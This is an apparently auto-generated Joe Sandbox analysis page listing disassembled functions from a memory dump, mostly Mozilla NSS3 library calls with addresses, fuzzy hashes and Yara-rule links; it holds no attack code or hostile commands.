Part of subcall function 6C805BC0: PR_Unlock.NSS3(0140BCE8,?,?,6C8080E3,00000000), ref: 6C805C4C
Part of subcall function 6C805BC0: PR_Unlock.NSS3(08C48300,?,?,6C8080E3,00000000), ref: 6C805C5F
Part of subcall function 6C805BC0: PR_ExitMonitor.NSS3(8B105D8B,?,?,6C8080E3,00000000), ref: 6C805C76
Part of subcall function 6C805BC0: PR_ExitMonitor.NSS3(840FC085,?,?,6C8080E3,00000000), ref: 6C805C8D
Part of subcall function 6C805BC0: PR_ExitMonitor.NSS3(07890478,?,?,6C8080E3,00000000), ref: 6C805CA4
Part of subcall function 6C805BC0: PR_ExitMonitor.NSS3(000000F4,?,?,6C8080E3,00000000), ref: 6C805CBB

PORT_ZAlloc_Util.NSS3(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8080AD), ref: 6C80ACED

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

PORT_ZAlloc_Util.NSS3(0000001C,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8080AD), ref: 6C80AD52
SECKEY_CopyPrivateKey.NSS3(?), ref: 6C80AEE5
SECKEY_CopyPublicKey.NSS3(?), ref: 6C80AEFC

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Util$memcpy$Alloc_EnterExit$Copy$Strdup_Unlock$ArenaItem_PrivatePublicValuecalloc
String ID:
API String ID: 3422837898-0
Opcode ID: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction ID: 12844628ecba4e6cf9314488a2e2230fe022f65ea5d05542eb79d127c0fa62d3
Opcode Fuzzy Hash: 85cc5416a763968eb51b84c2a7253d6907210f3b63f398a93b591fc88fe9c75d
Instruction Fuzzy Hash: E9D1F5B4A012069FDB54CF28C984BE5B7E5BF48304F1986B9DC1CDB706E730A994CBA1

Function 6C776DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C777D8F,6C777D8F,?,?), ref: 6C776DC8

Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7CFE08
Part of subcall function 6C7CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7CFE1D
Part of subcall function 6C7CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7CFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C777D8F,?,?), ref: 6C776DD5

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FA0,00000000,?,?,?,?,6C777D8F,?,?), ref: 6C776DF7

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776E35

Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7CFE29
Part of subcall function 6C7CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7CFE3D
Part of subcall function 6C7CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C7CFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776E4C

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776E82

Part of subcall function 6C776AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C77B21D,00000000,00000000,6C77B219,?,6C776BFB,00000000,?,00000000,00000000,?,?,?,6C77B21D), ref: 6C776B01
Part of subcall function 6C776AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C776B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C776F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C776F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898FE0,00000000), ref: 6C776F6B
PR_SetError.NSS3(FFFFE005,00000000,6C777D8F,?,?), ref: 6C776FE1

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction ID: a76f8d816472f364106ef560005530a98d291cdb9ae01cbce10d179df4bf0630
Opcode Fuzzy Hash: ceb873ad1b8a6cba2c5bfbc30416a6e34eb2e89637164e3023bc8a26a6daf788
Instruction Fuzzy Hash: AE717071E1064A9FDB10CF55CE44BAABBA8FF54308F154229E808D7B15F770EA94CBA0

Function 6C7B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B1057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B1085
PK11_GetAllTokens.NSS3 ref: 6C7B10B1
free.MOZGLUE(?), ref: 6C7B1107
PR_SetError.NSS3(00000000,00000000), ref: 6C7B1172
free.MOZGLUE(?), ref: 6C7B1182
free.MOZGLUE(?), ref: 6C7B11A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7B11C5

Part of subcall function 6C7B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B52DF
Part of subcall function 6C7B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C7B52F3
Part of subcall function 6C7B52C0: PR_Unlock.NSS3(?), ref: 6C7B5358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7B11F3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction ID: f410fb59c18849ea512567f5fc8e6b9767277884fe42e4c65313e76b44abf7b1
Opcode Fuzzy Hash: ca05a993eb323239df147db7037097239f6b9b1565d1b8bb926867165803a501
Instruction Fuzzy Hash: 166193B4E013499BEB10DF68DA89BAEB7B5AF04348F144138EC19BB741E731E945CB91

Function 6C7B4A20 Relevance: 15.2, APIs: 10, Instructions: 182COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?), ref: 6C7B4A4B
PK11_GetInternalSlot.NSS3 ref: 6C7B4A59
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7B4AC6
TlsGetValue.KERNEL32 ref: 6C7B4B17
EnterCriticalSection.KERNEL32(?), ref: 6C7B4B2B
PR_Unlock.NSS3(?), ref: 6C7B4B77
PK11_FreeSymKey.NSS3(?), ref: 6C7B4B87
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C7B4B9A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B4BA9
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4BC1

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$K11_$DestroyPrivatecalloc$CriticalDoesEnterErrorFreeInternalItem_MechanismSectionSlotUnlockUtilZfree
String ID:
API String ID: 3936029921-0
Opcode ID: 14186abca4667d4193910cfaffbc8897061ca537ac6d1c723a39997ebf37f265
Instruction ID: 1592b3ecf20b6910149cb438e629064181c9408225d552411b00132b8c3910b8
Opcode Fuzzy Hash: 14186abca4667d4193910cfaffbc8897061ca537ac6d1c723a39997ebf37f265
Instruction Fuzzy Hash: 8B515EB5E002199BDB00DF69DA49AAFB7F9AF48318F144139E905B7701E731ED148BA1

Function 6C7BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEF1
free.MOZGLUE(6C79CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C79CDBB,?), ref: 6C7BAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAF30

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction ID: 9f2299460153541df95634fb5d97584b3b2ef870f968f80d0d6330e1e058bcfc
Opcode Fuzzy Hash: c7eb1ceaf0e72d95042554202e78564e14487a9db68bbceaa298ec3d7586192b
Instruction Fuzzy Hash: E3519FB5A00602AFDB11EF29D989B56B7B4FF04328F144675E808A7E11E731F964CBD1

Function 6C794CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C79AB7F,?,00000000,?), ref: 6C794CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C79AB7F,?,00000000,?), ref: 6C794CC8
TlsGetValue.KERNEL32(?,6C79AB7F,?,00000000,?), ref: 6C794CE0
EnterCriticalSection.KERNEL32(?,?,6C79AB7F,?,00000000,?), ref: 6C794CF4
PL_HashTableLookup.NSS3(?,?,?,6C79AB7F,?,00000000,?), ref: 6C794D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C794D10

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C794D26

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C794D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C794DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C794E02

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction ID: 874c13a10434f642dd3e9e18c86cfdab3286a84f55047005acddcac9b28df0ee
Opcode Fuzzy Hash: db6ea02d13881ec8073b4277fad44fe13ba8c082fb748e7d07730171263d2567
Instruction Fuzzy Hash: 8A41E7B9A00101ABEB119F28FE49A6677B8BF1621DF044170ED19C7B22FB31D924C7E1

Function 6C814A70 Relevance: 15.1, APIs: 10, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000048,00000A20,0000032C,?,00000000,?,6C80AEC0,00000A20,00000000), ref: 6C814A8B

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

SECITEM_CopyItem_Util.NSS3(00000000,00000008,?,00000000), ref: 6C814AAA

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_Strdup_Util.NSS3(?,?,?,?,00000000), ref: 6C814ABD

Part of subcall function 6C7D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C772AF5,?,?,?,?,?,6C770A1B,00000000), ref: 6C7D0F1A
Part of subcall function 6C7D0F10: malloc.MOZGLUE(00000001), ref: 6C7D0F30
Part of subcall function 6C7D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7D0F42

SECITEM_CopyItem_Util.NSS3(00000000,00000020,?,?,?,?,?,00000000), ref: 6C814AD6
SECITEM_CopyItem_Util.NSS3(00000000,00000034,?,?,?,?,?,?,?,?,00000000), ref: 6C814AEC

Part of subcall function 6C7CFB60: PORT_Alloc_Util.NSS3(E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB9B

SECITEM_ZfreeItem_Util.NSS3(00000020,00000000,?,?,?,00000000), ref: 6C814B49
SECITEM_ZfreeItem_Util.NSS3(-00000034,00000000,?,?,?,?,?,00000000), ref: 6C814B58
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6C814B64
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C814B74
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 6C814B7E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Alloc_CopyZfree$freememcpy$ArenaStrdup_Valuecallocmallocstrlen
String ID:
API String ID: 476651045-0
Opcode ID: 2a6593fe6a7992120d9666cc6080f135023c9ceab7b8218e70dc63acdad3c7d8
Instruction ID: 15291211699b08525c5eb0e68d3c89cdbf02eed7f14f081733fb7f69d7ffd515
Opcode Fuzzy Hash: 2a6593fe6a7992120d9666cc6080f135023c9ceab7b8218e70dc63acdad3c7d8
Instruction Fuzzy Hash: D731B0B5604202AFD720CF65DD49A577BF8EF9924CB044969EC4AC7B02F731E605CBA1

Function 6C7989C0 Relevance: 15.1, APIs: 10, Instructions: 84COMMON

Download Yara Rule

APIs

PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C79AE9B,00000000,?,?), ref: 6C7989DE
PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C7989EF
PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B), ref: 6C798A02
PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C798A11

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Digest$Context$BeginCreateDestroy
String ID:
API String ID: 407214398-0
Opcode ID: 5d9b8ac05325f50a7ba230fc9452e28e70d58b902ddca9c727a91baefe396e10
Instruction ID: adeaf0e8dbee1498c55d61fc9644c90b414ece528503d5310b35364cc7d39fe7
Opcode Fuzzy Hash: 5d9b8ac05325f50a7ba230fc9452e28e70d58b902ddca9c727a91baefe396e10
Instruction Fuzzy Hash: C611BBF1A003015AFB005A65BF8ABABB558EB4175DF080036ED0999B42F762D918D2F2

Function 6C772E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C772CDA,?,00000000), ref: 6C772E1E

Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C779003,?), ref: 6C7CFD91
Part of subcall function 6C7CFD80: PORT_Alloc_Util.NSS3(A4686C7D,?), ref: 6C7CFDA2
Part of subcall function 6C7CFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7D,?,?), ref: 6C7CFDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C772E33

Part of subcall function 6C7CFD80: free.MOZGLUE(00000000,?,?), ref: 6C7CFDD1

TlsGetValue.KERNEL32 ref: 6C772E4E
EnterCriticalSection.KERNEL32(?), ref: 6C772E5E
PL_HashTableLookup.NSS3(?), ref: 6C772E71
PL_HashTableRemove.NSS3(?), ref: 6C772E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C772E96
PR_Unlock.NSS3 ref: 6C772EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C772EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C772EC5

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction ID: bfb03e5483728df5e84fe9ea5d53cb48ad9dd76491ff9dd245375c0d38318d85
Opcode Fuzzy Hash: 7bab4410470cbaa171719266419529daaa244b9961cd1003c7e2b9dab6ba6cb9
Instruction Fuzzy Hash: 2821DA76A40105ABDF211B29ED0DA9B3B79DB5235DF040530ED2886B11FB32D958D7E1

Function 6C6FCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6FB999), ref: 6C6FD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6FB999), ref: 6C6FD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6FB999), ref: 6C84972B

Strings

database corruption, xrefs: 6C6FCFE7, 6C6FD013, 6C6FD028, 6C6FD039, 6C6FD03E, 6C849786
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FCFDD, 6C6FD00E, 6C6FD022, 6C6FD033, 6C849780
%s at line %d of [%.10s], xrefs: 6C6FCFEC, 6C6FD018, 6C6FD029, 6C6FD03F, 6C84978B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 8ed74df995b9505b982a0549f9d737b15d53fe2b27b24695b1540a075585082a
